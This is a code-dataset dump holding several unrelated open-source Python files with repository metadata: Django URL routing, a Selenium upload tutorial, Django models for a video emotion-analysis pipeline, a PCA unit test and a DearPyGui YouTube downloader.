2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.conf.urls import include
from rest_framework.authtoken.views import obtain_auth_token
urlpatterns = [
path('admin/', admin.site.urls),
path('api/', include('api.urls')),
path('auth/', obtain_auth_token),
]
| [
"yugguo@adobe.com"
] | yugguo@adobe.com |
6f71f8c2009acaee5f18bf0ff7b498764b45a894 | 922d4d17e73120e5075d95385b5d930adedf4ba4 | /fileupload.py | 1759017fea234674c0e7bea021ffab3e944f2a87 | [] | no_license | Animesh66/SeleniumTutorial | 31adf60b5ff4d54a49071fcdd12d88f67aa79aeb | fe61fc9fff4d46a6951919d51d81b048451c2e3d | refs/heads/master | 2023-05-09T21:43:51.689598 | 2021-05-28T17:10:51 | 2021-05-28T17:10:51 | 369,188,765 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 520 | py | from selenium import webdriver
import time
driver = webdriver.Chrome()
driver.maximize_window()
driver.get("https://testautomationpractice.blogspot.com/")
driver.set_page_load_timeout(10)
driver.switch_to_frame(0) # switch to fame to identify the form
upload_file = driver.find_element_by_id("RESULT_FileUpload-10") # this command will identify the upload file button
file_path = "/Users/animeshmukherjee/Downloads/Dexter.jpeg" # this is the file path
upload_file.send_keys(file_path) # perform upload file process
| [
"er.animesh6@hotmail.com"
] | er.animesh6@hotmail.com |
d54b95cb3abb42444dba3471fb97d13b45c2bc5f | fe628361e4b4b6acaf693cc9bdde3d25c1926dec | /ers_backend/dataset_manager/models.py | 2e6484d585ae2d3de686bf9de526691ec7c25359 | [
"MIT"
] | permissive | dumoulinj/ers | bcd0de8df8f63e12f7659d5ea1efe32e272e8d66 | ce38ba8acf8fed8dbf27fb85fa6c024540763286 | refs/heads/master | 2020-12-26T03:10:30.550545 | 2016-07-26T07:49:56 | 2016-07-26T07:49:56 | 35,938,084 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 29,490 | py | import os
import logging
import collections
import shutil
from PIL import Image, ImageStat
from converter.ffmpeg import FFMpeg
import cv2
from cv2 import cv
from django.db import models
from swampdragon.models import SelfPublishModel
from django_enumfield import enum
from jsonfield.fields import JSONField
from django.conf import settings
from arousal_modeler.models import Arousal
from audio_processor.models import OpensmileExtractor
from dataset_manager.dragon_serializers import VideoSerializer, DatasetSerializer
from dataset_manager.enums import FeatureType, ComputingStateType, EmotionType, FeatureFunctionType
from ers_backend.utils import is_video, convert_video_2_mp4, convert_video_2_webm, extract_wav_from_video, \
mkdir_if_not_exists, is_emotion_dir, replace_right
from video_processor.enums import ShotBoundariesDetectionAlgorithmType
from video_processor.models import ShotsDetection, ECR, ColorHistograms
logger = logging.getLogger(__name__)
#-----------------------------------------------------------------------------------------------------------------------
# Dataset
#-----------------------------------------------------------------------------------------------------------------------
class Dataset(SelfPublishModel, models.Model):
"""
Model representing a dataset. It contains a list of multimedia elements.
The prepare() method is used to create the directory structure, list the videos, and create the database entries.
"""
serializer_class = DatasetSerializer
name = models.CharField(max_length=50, unique=True)
description = models.TextField(default="Dataset description...")
# Monitoring
preparation_state = enum.EnumField(ComputingStateType, default=ComputingStateType.NO)
scan_state = enum.EnumField(ComputingStateType, default=ComputingStateType.NO)
videos_preparation_state = enum.EnumField(ComputingStateType, default=ComputingStateType.NO)
videos_preparation_nb_videos_done = models.IntegerField(default=0)
shot_boundaries_detection_state = enum.EnumField(ComputingStateType, default=ComputingStateType.NO)
shot_boundaries_detection_nb_videos_done = models.IntegerField(default=0)
feature_extraction_state = enum.EnumField(ComputingStateType, default=ComputingStateType.NO)
feature_extraction_nb_videos_done = models.IntegerField(default=0)
arousal_modeling_state = enum.EnumField(ComputingStateType, default=ComputingStateType.NO)
arousal_modeling_nb_videos_done = models.IntegerField(default=0)
available_features = JSONField(default=[], blank=True)
# Properties
def _base_path(self):
return os.path.join(settings.DATASET_DEFAULT_PATH, self.name)
base_path = property(_base_path)
def _video_path(self):
return os.path.join(self.base_path, "video")
video_path = property(_video_path)
def _converted_video_path(self):
return os.path.join(self.base_path, "converted")
converted_video_path = property(_converted_video_path)
def _web_video_path(self):
return settings.WEBCLIENT_VIDEOS_PATH.replace("$datasetId$", str(self.id))
web_video_path = property(_web_video_path)
def _audio_path(self):
return os.path.join(self.base_path, "audio")
audio_path = property(_audio_path)
def _frame_path(self):
return os.path.join(self.base_path, "frames")
frame_path = property(_frame_path)
def _ground_truth_path(self):
return os.path.join(self.base_path, "ground_truth")
ground_truth_path = property(_ground_truth_path)
def _shot_boundaries_ground_truth_path(self):
return os.path.join(self.ground_truth_path, "shot_boundaries")
shot_boundaries_ground_truth_path = property(_shot_boundaries_ground_truth_path)
def _video_list(self):
videos = list()
for elt in os.listdir(self.video_path):
if is_video(elt):
videos.append((elt, None))
elif is_emotion_dir(os.path.join(self.video_path, elt)):
for sub_elt in os.listdir(os.path.join(self.video_path, elt)):
if is_video(sub_elt):
videos.append((sub_elt, EmotionType.get_enum_from_label(elt)))
return videos
video_list = property(_video_list)
def _nb_videos(self):
return self.videos.count()
nb_videos = property(_nb_videos)
# Methods
def get_video_path(self, emotion):
if emotion is not None:
return os.path.join(self.video_path, EmotionType.labels[emotion])
else:
return self.video_path
def prepare(self):
"""
Prepare the dataset, create directories.
"""
self.preparation_state = ComputingStateType.IN_PROGRESS
self.save()
logger.info("Preparing dataset %s...", self.name)
# Check and create directories
directories = [
self.base_path,
self.video_path,
self.audio_path,
self.converted_video_path,
self.web_video_path,
self.frame_path,
self.ground_truth_path,
self.shot_boundaries_ground_truth_path
]
self.preparation_state = ComputingStateType.SUCCESS
for directory in directories:
if not mkdir_if_not_exists(directory):
logger.error("Unable to create directory: %s", directory)
self.preparation_state = ComputingStateType.FAILED
self.save()
logger.debug("Preparation for dataset %s done\n", self.name)
def create_or_update_video(self, video_filename, emotion):
"""
Create or update a video element, get information, and associate with the dataset
"""
updated = False
# Create/update the multimedia element
if self.videos.filter(full_name=video_filename).exists():
logger.debug("Updating multimedia element for: %s", video_filename)
updated = True
video = self.videos.get(full_name=video_filename)
audio_part = video.audio_part
video_part = video.video_part
else:
logger.debug("Creating multimedia element for: %s", video_filename)
video = Video()
audio_part = AudioPart()
video_part = VideoPart()
video.dataset = self
video.full_name = video_filename
video.emotion = emotion
video.save()
audio_part.video = video
audio_part.save()
video_part.video = video
video_part.save()
logger.info("Video created/updated: %s", video_filename)
return updated
def scan_video_folder(self):
"""
Scan video folder, look for video files, and create video instances.
"""
self.scan_state = ComputingStateType.IN_PROGRESS
self.save()
logger.info("Scanning video folder for dataset %s...", self.name)
created_videos = list()
updated_videos = list()
# List videos
for video_filename, emotion in self.video_list:
if self.create_or_update_video(video_filename, emotion):
updated_videos.append((video_filename, emotion))
else:
created_videos.append((video_filename, emotion))
self.scan_state = ComputingStateType.SUCCESS
self.save()
logger.debug("Scanning video folder for dataset %s done\n", self.name)
return [created_videos, updated_videos]
def prepare_videos(self, overwrite=False):
"""
Prepare each videos of the dataset
"""
self.videos_preparation_nb_videos_done = 0
self.videos_preparation_state = ComputingStateType.IN_PROGRESS
self.save()
logger.info("Preparing videos for dataset %s...", self.name)
errors = False
warnings = False
for video in self.videos.all():
video.prepare(overwrite=overwrite)
if video.preparation_state == ComputingStateType.FAILED:
errors = True
elif video.preparation_state == ComputingStateType.WARNING:
warnings = True
self.videos_preparation_nb_videos_done += 1
self.save()
if errors:
self.videos_preparation_state = ComputingStateType.FAILED
logger.error("Error during the preparation of videos for dataset %s\n", self.name)
elif warnings:
self.videos_preparation_state = ComputingStateType.WARNING
logger.warning("Control that the preparation of videos for dataset %s has worked\n", self.name)
else:
self.videos_preparation_state = ComputingStateType.SUCCESS
logger.debug("Preparing videos for dataset %s done\n", self.name)
self.save()
def detect_shot_boundaries(self, configuration=None):
"""
Detect shot boundaries for each videos of the dataset.
"""
self.shot_boundaries_detection_nb_videos_done = 0
self.shot_boundaries_detection_state = ComputingStateType.IN_PROGRESS
self.save()
logger.info("Detecting shot boundaries for dataset %s...", self.name)
errors = False
warnings = False
# Prepare shot detection
shots_detection = ShotsDetection()
shots_detection.save()
if configuration:
for entry in configuration:
algorithm = None
if(entry['value'] == ShotBoundariesDetectionAlgorithmType.COLOR_HISTOGRAM):
algorithm = ColorHistograms()
algorithm.type = ShotBoundariesDetectionAlgorithmType.COLOR_HISTOGRAM
else:
algorithm = ECR()
algorithm.type = ShotBoundariesDetectionAlgorithmType.ECR
algorithm.threshold = entry['threshold']
algorithm.shots_detection = shots_detection
algorithm.save()
else:
# Prepare default algorithm
algorithm = ECR()
algorithm.type = ShotBoundariesDetectionAlgorithmType.ECR
algorithm.shots_detection = shots_detection
algorithm.threshold = 0.7
algorithm.save()
logger.debug("Using default configuration: ECR with threshold=%s" % (algorithm.threshold))
for video in self.videos.all():
try:
video.detect_shot_boundaries(shots_detection)
if video.shot_boundaries_detection_state == ComputingStateType.FAILED:
errors = True
elif video.shot_boundaries_detection_state == ComputingStateType.WARNING:
warnings = True
except:
errors = True
self.shot_boundaries_detection_nb_videos_done += 1
self.save()
if errors:
self.shot_boundaries_detection_state = ComputingStateType.FAILED
logger.error("Error during the detection of shot boundaries for dataset %s\n", self.name)
elif warnings:
self.shot_boundaries_detection_state = ComputingStateType.WARNING
logger.warning("Control that the shot boundaries detection for dataset %s has worked\n", self.name)
else:
self.shot_boundaries_detection_state = ComputingStateType.SUCCESS
logger.debug("Shot boundaries detection for dataset %s done", self.name)
self.save()
def extract_features(self, feature_types=None, overwrite=False):
self.feature_extraction_state = ComputingStateType.IN_PROGRESS
self.feature_extraction_nb_videos_done = 0
self.save()
logger.info("Extracting features for dataset %s...", self.name)
errors = False
warnings = False
for video in self.videos.all():
try:
video.extract_features(feature_types=feature_types, overwrite=overwrite)
if video.feature_extraction_state == ComputingStateType.FAILED:
errors = True
elif video.feature_extraction_state == ComputingStateType.WARNING:
warnings = True
except:
errors = True
self.feature_extraction_nb_videos_done += 1
self.save()
if errors:
self.feature_extraction_state = ComputingStateType.FAILED
logger.error("Error during the features extraction for dataset %s\n", self.name)
elif warnings:
self.feature_extraction_state = ComputingStateType.WARNING
logger.warning("Control that the features extraction for dataset %s has worked\n", self.name)
else:
self.feature_extraction_state = ComputingStateType.SUCCESS
logger.debug("Features extraction for dataset %s done", self.name)
if not errors:
if overwrite:
self.available_features = feature_types
else:
self.available_features = list(set(feature_types + self.available_features))
self.save()
def model_arousal(self, feature_types, overwrite=False):
self.arousal_modeling_state = ComputingStateType.IN_PROGRESS
self.arousal_modeling_nb_videos_done = 0
self.save()
logger.info("Modeling arousal for dataset %s...", self.name)
errors = False
warnings = False
for video in self.videos.all():
try:
video.model_arousal(feature_types, overwrite=overwrite)
if video.arousal_modeling_state == ComputingStateType.FAILED:
errors = True
elif video.arousal_modeling_state == ComputingStateType.WARNING:
warnings = True
except:
errors = True
self.arousal_modeling_nb_videos_done += 1
self.save()
if errors:
self.arousal_modeling_state = ComputingStateType.FAILED
logger.error("Error during the arousal modeling for dataset %s\n", self.name)
elif warnings:
self.arousal_modeling_state = ComputingStateType.WARNING
logger.warning("Control that the arousal modeling for dataset %s has worked\n", self.name)
else:
self.arousal_modeling_state = ComputingStateType.SUCCESS
logger.debug("Arousal modeling for dataset %s done", self.name)
self.save()
#-----------------------------------------------------------------------------------------------------------------------
# Video
#-----------------------------------------------------------------------------------------------------------------------
class Video(SelfPublishModel, models.Model):
"""
Model representing a multimedia element. A multimedia element consists of general information, an embedded video
and an embedded audio.
"""
serializer_class = VideoSerializer
dataset = models.ForeignKey(Dataset, related_name='videos')
shots_detections = models.ManyToManyField('video_processor.ShotsDetection', through='video_processor.VideoShotsResult')
full_name = models.CharField(max_length=50, blank=False)
description = models.TextField(max_length=400, blank=True)
emotion = enum.EnumField(EmotionType, null=True, default=None)
# Information fields
format = models.CharField(max_length=50, blank=True)
duration = models.FloatField(default=0.)
bitrate = models.FloatField(default=0.)
# Time frame annotations
#time_frame_annotations = ListField(EmbeddedModelField('timeframe_annotator.TimeFrameAnnotation'))
# Ground truth
shot_boundaries_ground_truth = JSONField(load_kwargs={'object_pairs_hook': collections.OrderedDict})
# Monitoring
preparation_state = enum.EnumField(ComputingStateType, default=ComputingStateType.NO)
shot_boundaries_detection_state = enum.EnumField(ComputingStateType, default=ComputingStateType.NO)
feature_extraction_state = enum.EnumField(ComputingStateType, default=ComputingStateType.NO)
arousal_modeling_state = enum.EnumField(ComputingStateType, default=ComputingStateType.NO)
available_features = JSONField(default=[])
# Properties
def _name(self):
filename, extension = os.path.splitext(self.full_name)
return filename
name = property(_name)
def _converted_filename(self):
return self.name + ".mp4"
converted_filename = property(_converted_filename)
def _path(self):
return os.path.join(self.dataset.converted_video_path, self.converted_filename)
path = property(_path)
def _original_path(self):
return os.path.join(self.dataset.get_video_path(self.emotion), self.full_name)
original_path = property(_original_path)
def _audio_path(self):
return os.path.join(self.dataset.audio_path, self.name + ".wav")
audio_path = property(_audio_path)
def _nb_frames(self):
return int(self.duration * float(self.video_part.fps))
nb_frames = property(_nb_frames)
# Methods
def prepare(self, overwrite=False):
"""
Prepare video:
- convert video format for web
- extract audio in .wav
"""
errors = False
warnings = False
logger.info("Prepare video: %s", self.name)
# For monitoring
self.preparation_state = ComputingStateType.IN_PROGRESS
self.save()
dataset = self.dataset
# # Read shot boundaries ground truth
# shot_boundaries_ground_truth = []
# ground_truth_path = os.path.join(dataset.shot_boundaries_ground_truth_path, self.name + ".csv",)
# if os.path.isfile(ground_truth_path):
# with open(ground_truth_path, "Ur") as f:
# for row in csv.reader(f, delimiter=','):
# for frame in row:
# shot_boundaries_ground_truth.append(int(frame))
# else:
# logger.debug("No ground truth file found for video %s", self.name)
#
# self.shot_boundaries_ground_truth = shot_boundaries_ground_truth
# self.save()
# Convert video and store in converted folder
logger.debug("Converting video (in mp4 and webm): %s", self.full_name)
if overwrite or not os.path.exists(self.path):
result_state = convert_video_2_mp4(self.original_path, self.path)
if result_state == ComputingStateType.FAILED:
errors = True
elif result_state == ComputingStateType.WARNING:
warnings = True
webm_path = replace_right(self.path, ".mp4", ".webm", 1)
if overwrite or not os.path.exists(webm_path):
result_state = convert_video_2_webm(self.original_path, webm_path)
if result_state == ComputingStateType.FAILED:
errors = True
elif result_state == ComputingStateType.WARNING:
warnings = True
# Copying converted videos to web folder
logger.debug("Copying converted videos for %s to web folder.", self.full_name)
try:
shutil.copy(self.path, self.dataset.web_video_path)
shutil.copy(webm_path, self.dataset.web_video_path)
except:
errors = True
# Extract wav and store in audio folder
logger.debug("Extracting wav from video: %s", self.full_name)
if overwrite or not os.path.exists(self.audio_path):
result_state = extract_wav_from_video(self.path, self.audio_path)
if result_state == ComputingStateType.FAILED:
errors = True
elif result_state == ComputingStateType.WARNING:
warnings = True
# Get video information
info = FFMpeg().probe(self.path)
if info:
self.format = info.format.format
self.duration = info.format.duration
self.bitrate = info.format.bitrate
self.save()
self.audio_part.codec = info.audio.codec
self.audio_part.channels = info.audio.audio_channels
self.audio_part.samplerate = info.audio.audio_samplerate
self.audio_part.save()
self.video_part.codec = info.video.codec
self.video_part.width = info.video.video_width
self.video_part.height = info.video.video_height
self.video_part.fps = info.video.video_fps
self.video_part.save()
else:
errors = True
# For monitoring
if errors:
self.preparation_state = ComputingStateType.FAILED
elif warnings:
self.preparation_state = ComputingStateType.WARNING
else:
self.preparation_state = ComputingStateType.SUCCESS
self.save()
logger.info("Preparation done for video %s\n", self.name)
def detect_shot_boundaries(self, shots_detection=None):
"""
Detect shot boundaries for the video, using the given algorithm configuration, or use a default algo
configuration.
"""
self.shot_boundaries_detection_state = ComputingStateType.IN_PROGRESS
self.save()
if shots_detection is None:
# Prepare shot detection
shots_detection = ShotsDetection()
shots_detection.save()
# Prepare default algorithm
algo = ECR()
algo.shots_detection = shots_detection
algo.threshold = 0.7
algo.save()
logger.debug("Using default configuration: ECR with threshold=%s" % (algo.threshold))
try:
if shots_detection.detect(self) > 0:
self.shot_boundaries_detection_state = ComputingStateType.SUCCESS
else:
self.shot_boundaries_detection_state = ComputingStateType.WARNING
except:
self.shot_boundaries_detection_state = ComputingStateType.FAILED
self.save()
def extract_features(self, feature_types=None, overwrite=False):
"""
Compute features specified in features_type_list. Overwrite existing features if asked for.
"""
errors = False
warnings = False
self.feature_extraction_state = ComputingStateType.IN_PROGRESS
self.save()
logger.info("Computing features for video: %s", self.name)
if overwrite:
# Remove all features
logger.debug("Removing all features for video: %s" % (self.name))
try:
self.audio_part.features.all().delete()
self.video_part.features.all().delete()
except:
logger.warning("A problem occured when removing features for video: %s" % (self.name))
for feature_type in feature_types:
if feature_type in FeatureType.audio_features:
multimedia_part = self.audio_part
elif feature_type in FeatureType.video_features:
multimedia_part = self.video_part
if multimedia_part.features.filter(type=feature_type).exists():
continue
else:
logger.debug("Creating %s features for video: %s" % (feature_type, self.name))
features = Features()
features.multimedia_part = multimedia_part
features.type = feature_type
features.save()
result_state = features.compute()
if result_state == ComputingStateType.FAILED:
errors = True
elif result_state == ComputingStateType.WARNING:
warnings = True
# For monitoring
if errors:
self.feature_extraction_state = ComputingStateType.FAILED
elif warnings:
self.feature_extraction_state = ComputingStateType.WARNING
else:
self.feature_extraction_state = ComputingStateType.SUCCESS
if not errors:
if overwrite:
self.available_features = list(feature_types)
else:
self.available_features = list(set(feature_types + self.available_features))
self.save()
logger.info("Features computed for video: %s", self.name)
def model_arousal(self, feature_types, overwrite=False, configuration=None):
logger.info("Modeling arousal for video: %s", self.full_name)
if hasattr(self, 'arousal') and not self.arousal is None:
if overwrite:
arousal = self.arousal
else:
return
else:
arousal = Arousal()
arousal.video = self
self.arousal_modeling_state = ComputingStateType.IN_PROGRESS
self.save()
try:
arousal.model(feature_types)
self.arousal_modeling_state = ComputingStateType.SUCCESS
except:
self.arousal_modeling_state = ComputingStateType.FAILED
self.save()
logger.info("Arousal modelled for video: %s", self.full_name)
def evaluate_sbd(self):
video_shots_results = self.video_shots_results
for video_shots_result in video_shots_results.all():
shots_detection = video_shots_result.shots_detection
shots_detection.evaluate(self)
class MultimediaPart(models.Model):
"""
Abstract class, as parent class for AudioPart and VideoPart.
"""
pass
class AudioPart(MultimediaPart):
"""
Model representing the audio part of a multimedia element.
"""
video = models.OneToOneField(Video, related_name='audio_part')
# Information fields
codec = models.CharField(max_length=50, blank=True)
channels = models.IntegerField(default=0)
samplerate = models.FloatField(default=0.)
class VideoPart(MultimediaPart):
"""
Model representing the video part of a multimedia element.
"""
video = models.OneToOneField(Video, related_name='video_part')
# Information fields
codec = models.CharField(max_length=50, blank=True)
width = models.IntegerField(default=0)
height = models.IntegerField(default=0)
fps = models.FloatField(default=0.)
#-----------------------------------------------------------------------------------------------------------------------
# Features
#-----------------------------------------------------------------------------------------------------------------------
class Features(models.Model):
multimedia_part = models.ForeignKey(MultimediaPart, related_name='features')
type = enum.EnumField(FeatureType, default=FeatureType.ENERGY)
values = JSONField()
values_normalized = JSONField()
values_processed = JSONField()
def compute_shot_cut_density(self, video_shots_result=None):
"""
Compute shot cut density using the video shots result passed in argument. If video shots result is not passed,
last result is used. If no result available, create one with default algorithm parameters.
:param video_shots_result:
:return:
"""
video = self.multimedia_part.video
if video_shots_result:
shot_cut_density = video_shots_result.compute_shot_cut_density()
else:
if video.video_shots_results.count() == 0:
video.detect_shot_boundaries()
# TODO: need to add a selected field on video_shots_results and use it here!
shot_cut_density = video.video_shots_results.latest('id').compute_shot_cut_density()
return shot_cut_density
def compute_brightness(self):
# Create video capture
video = self.multimedia_part.video
capture = cv2.VideoCapture(video.path)
brightness = list()
frame_nb = 0
while True:
f, crt_frame = capture.read()
if crt_frame is None:
# End of video
break
cv_size = lambda img: tuple(img.shape[1::-1])
size = cv_size(crt_frame)
cv_frame = cv2.cvtColor(crt_frame, cv2.COLOR_BGR2GRAY)
im = Image.frombytes("L", size, cv_frame.tostring())
stat = ImageStat.Stat(im)
frame_brightness = stat.rms[0]
brightness.append([frame_nb, frame_brightness])
frame_nb += 1
return {FeatureFunctionType.VALUE: brightness}
def compute(self):
if self.type in FeatureType.audio_features:
opensmile_extractor = OpensmileExtractor()
try:
extracted_features = opensmile_extractor.compute(self)
except Exception as e:
logger.error(e.strerror)
return ComputingStateType.FAILED
elif self.type in FeatureType.video_features:
if self.type == FeatureType.SHOT_CUT_DENSITY:
try:
extracted_features = self.compute_shot_cut_density()
except Exception as e:
return ComputingStateType.FAILED
elif self.type == FeatureType.BRIGHTNESS:
try:
extracted_features = self.compute_brightness()
except:
return ComputingStateType.FAILED
if len(extracted_features) > 0 :
self.values = extracted_features
self.save()
return ComputingStateType.SUCCESS
else:
return ComputingStateType.WARNING
| [
"d.jo3l@live.com"
] | d.jo3l@live.com |
b5876dc9d96aa0353a010e6ab41149777db2839f | 826d6d3a2f691046bc65d25d00a23d1b4444c4d5 | /tecpython/lib/python3.7/_dummy_thread.py | 6b010bea891f9bf63be652923541c8da3127db17 | [] | no_license | oscargarciahernandez/QuesiQuieroOquesiTeqno | e3391d56329d84d52ad4a61270dab8bef34db15c | 2f7024f08a6de6a84d0fb5f40832df70aee48c6f | refs/heads/master | 2023-01-19T22:43:44.789533 | 2020-11-23T13:07:20 | 2020-11-23T13:07:20 | 285,193,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 50 | py | /home/ai5/anaconda3/lib/python3.7/_dummy_thread.py | [
"proyectoroseo@gmail.com"
] | proyectoroseo@gmail.com |
09b3a389b1084df14d4c4a8c2f0930a95a481b25 | 44a7330dfa4fe321eb432ee57a32328578dec109 | /milk/tests/test_pca.py | e543aff8ebdf2506e861097e21e31271cf4bb07d | [
"MIT"
] | permissive | tzuryby/milk | 7cb6760fad600e9e0d0c9216dc749db289b596fb | a7159b748414d4d095741978fb994c4affcf6b9b | refs/heads/master | 2020-12-29T02:45:33.044864 | 2011-03-15T20:23:29 | 2011-03-15T20:25:11 | 1,485,748 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 472 | py | import numpy.random
import milk.unsupervised.pca
import numpy as np
def test_pca():
numpy.random.seed(123)
X = numpy.random.rand(10,4)
X[:,1] += numpy.random.rand(10)**2*X[:,0]
X[:,1] += numpy.random.rand(10)**2*X[:,0]
X[:,2] += numpy.random.rand(10)**2*X[:,0]
Y,V = milk.unsupervised.pca(X)
Xn = milk.unsupervised.normalise.zscore(X)
assert X.shape == Y.shape
assert ((np.dot(V[:4].T,Y[:,:4].T).T-Xn)**2).sum()/(Xn**2).sum() < .3
| [
"lpc@cmu.edu"
] | lpc@cmu.edu |
531d55b58e3c9467b232a7cc8f8185b0e9295939 | 08b3c2cb6cb9df8a8779e82eb9faef0df7e137ab | /src/dpg-yt-dl.py | 18601796ccbcaa9709a24c98e43d7357d6361dc4 | [] | no_license | RNubla/dearpygui-ytdl | 0e9332552c46acda4605faf4c67ea635a373dcaf | 1acbee275d56279337576353e98eb20acec05f23 | refs/heads/main | 2023-06-19T20:36:39.532886 | 2021-07-14T18:47:10 | 2021-07-14T18:47:10 | 385,402,833 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,311 | py | from knownpaths import FOLDERID
import dearpygui.dearpygui as dpg
import re
import pafy
from moviepy.editor import *
import os
from my_mvLogger import myMvLogger
# from knownpaths import folderid
import knownpaths as kp
from screeninfo import get_monitors
# create viewport takes in config options too!
primary_window = dpg.generate_uuid()
class YTDL:
def __init__(self):
self.video = None
self.available_streams = []
self.available_video_streams = []
self.available_audio_streams = []
self.file_path = None
self.file_path_text_widget = None
self.video_quality_list = []
self.audio_quality_list = []
self.video_element_selected_index = None
self.audio_element_selected_index = None
self.video_title = ''
self.audio_title = ''
self.video_extension = None
self.audio_extension = None
self.video_url = None
self.audio_url = None
self.video_quality_listbox_id = dpg.generate_uuid()
self.audio_quality_listbox_id = dpg.generate_uuid()
self.url_input_text_id = dpg.generate_uuid()
self.logger = None
# self.logger = myMvLogger(0, dpg.get_item_height(
# item=primary_window), 'Log information', width=dpg.get_item_width(item=primary_window), height=500)
def select_audio_stream_quality(self, sender, user_data):
audio_re = re.search('audio:(.*)@', user_data)
self.audio_extension = audio_re.group(1)
self.logger.log_info(f'Audio Extension: {self.audio_extension}')
temp_available_audio_stream_str = [
str(x) for x in self.available_audio_streams]
self.audio_element_selected_index = temp_available_audio_stream_str.index(
user_data)
self.audio_url = self.available_audio_streams[self.audio_element_selected_index].url
def select_video_stream_quality(self, sender, user_data):
video_re = re.search('video:(.*)@', user_data)
self.video_extension = video_re.group(1)
self.logger.log_info(f'Video Extension: {self.video_extension}')
temp_available_video_stream_str = [
str(x) for x in self.available_video_streams]
self.video_element_selected_index = temp_available_video_stream_str.index(
user_data)
self.video_url = self.available_video_streams[self.video_element_selected_index].url
def get_video_info(self):
url = str(dpg.get_value(self.url_input_text_id))
print(url)
self.video = pafy.new(url=url)
# check if title has ':' or '|' or both;
# if they do, then replace those characters with and '_'
self.video_title = str(self.video.title)
if ':' in str(self.video.title) or '|' in str(self.video.title) or ':' and '|' in str(self.video.title):
# self.audio_title = str(self.video.title)
self.video_title = self.video_title.replace(':', '_')
self.audio_title = self.video_title.replace(':', '_')
self.video_title = self.video_title.replace('|', '_')
self.audio_title = self.video_title.replace('|', '_')
print(self.video_title)
# self.allstreams = self.video.allstreams
self.available_video_streams = [
(x) for x in self.video.allstreams if 'video' in str(x)]
self.logger.log_info(str(self.available_video_streams))
# self.logger.log(str(self.available_video_streams))
# AUDIO
self.available_audio_streams = [
x for x in self.video.allstreams if 'audio' in str(x)]
self.logger.log_info(str(self.available_audio_streams))
# print(str(self.available_video_streams))
dpg.configure_item(item=self.video_quality_list,
items=self.available_video_streams, callback=self.select_video_stream_quality, user_data='USER_DATA')
dpg.configure_item(item=self.audio_quality_list,
items=self.available_audio_streams, callback=self.select_audio_stream_quality, user_data='USER_DATA')
def merge_video_and_audio(self):
ffmpeg_tools.ffmpeg_merge_video_audio(
video=f'{str(self.file_path)}\{str(self.video_title)}-v.{str(self.video_extension)}', audio=f'{str(self.file_path)}\{str(self.video_title)}-a.{str(self.audio_extension)}', output=f'{str(self.file_path)}\{str(self.video_title)}.{str(self.video_extension)}', vcodec='copy', acodec='copy')
def cleanup_files(self):
os.remove(
f'{self.file_path}\{self.video_title}-v.{self.video_extension}')
os.remove(
f'{self.file_path}\{self.video_title}-a.{self.audio_extension}')
def output_folder(self, sender, app_data, user_data):
self.file_path = app_data['current_path']
# print(app_data['current_path'])
dpg.configure_item(item=self.file_path_text_widget,
default_value=f'{self.file_path}')
print(self.file_path)
def download_files(self):
# self.logger.log_debug(f'Video_title: {self.video_title}')
self.logger.log_info('Downloading Audio Please Wait....')
self.logger.log_debug(
f'VIDEO: {self.video_title}.{self.video_extension}')
self.available_audio_streams[self.audio_element_selected_index].download(
quiet=False, filepath=f'{self.file_path}\{self.video_title}-a.{self.audio_extension}')
# print(self.audio_url)
self.logger.log_info('Downloading Video Please Wait....')
self.logger.log_debug(
f'Audio: {self.video_title}.{self.audio_extension}')
self.logger.log_debug(
f'{self.video_url}')
# print(self.video_url)
self.available_video_streams[self.video_element_selected_index].download(
quiet=False, filepath=f'{str(self.file_path)}\{str(self.video_title)}-v.{str(self.video_extension)}')
self.logger.log_info('Merging Audio and Video; Please wait....')
self.merge_video_and_audio()
self.logger.log_info('Removing Temp Files....')
self.cleanup_files()
self.logger.log_info('Done')
os.startfile(self.file_path)
def hexToRGB(hex: str):
# h = hex.lstrip('#')
return tuple(int(hex[i:i+2], 16) for i in (0, 2, 4))
print(hexToRGB('9e9e9e'))
folder_id = getattr(FOLDERID, 'Downloads')
# print(kp.get_path(folderid=folder_id))
vp = dpg.create_viewport(title='Youtube-DL', width=770, height=750)
yt = YTDL()
file_dialog = dpg.add_file_dialog(directory_selector=True, default_path=(kp.get_path(folderid=folder_id)),
show=False, callback=yt.output_folder, width=300, height=400, label='Select an output directory')
font_dir = os.path.join(os.path.dirname(os.path.dirname(
os.path.realpath(__file__))), 'fonts/Lato/Lato-Regular.ttf')
# https://coolors.co/3d5a80-98c1d9-e0fbfc-ee6c4d-293241
with dpg.theme(default_theme=True) as theme_id:
dpg.add_theme_color(dpg.mvThemeCol_WindowBg, hexToRGB(
'3d5a80'), category=dpg.mvThemeCat_Core)
dpg.add_theme_color(dpg.mvThemeCol_FrameBg, hexToRGB(
'293241'), category=dpg.mvThemeCat_Core)
dpg.add_theme_color(dpg.mvThemeCol_Button, hexToRGB('ee6c4d'),
category=dpg.mvThemeCat_Core)
dpg.add_theme_style(dpg.mvStyleVar_FrameRounding,
2, category=dpg.mvThemeCat_Core)
with dpg.font_registry():
dpg.add_font(font_dir, 18, default_font=True)
with dpg.window(label="Example Window", width=750, no_title_bar=True, height=205, id=primary_window, no_move=True, no_resize=True):
dpg.set_primary_window(primary_window, False)
with dpg.group(label="InputGroup", width=300):
dpg.add_text(default_value='Download Youtube Videos')
dpg.add_input_text(label='Enter URL Here',
id=yt.url_input_text_id, callback=yt.get_video_info)
dpg.add_button(label='Select output folder',
callback=lambda: dpg.show_item(file_dialog))
dpg.add_same_line()
yt.file_path_text_widget = dpg.add_text(
default_value=f'{yt.file_path}')
dpg.add_spacing()
dpg.add_separator()
dpg.add_spacing()
with dpg.group(label='QualityGroup', width=300):
yt.video_quality_list = dpg.add_combo(
label='Video Qualities', items=yt.available_video_streams, show=True, id=yt.video_quality_listbox_id)
yt.audio_quality_list = dpg.add_combo(
label='Audio Qualities', items=yt.available_audio_streams, show=True, id=yt.audio_quality_listbox_id)
dpg.add_spacing()
dpg.add_separator()
dpg.add_spacing()
yt.logger = myMvLogger(0, dpg.get_item_height(item=primary_window),
'Log information', width=dpg.get_item_width(item=primary_window), height=500, no_move=True, no_resize=True)
dpg.add_button(label="Download", callback=yt.download_files,
user_data=yt.logger)
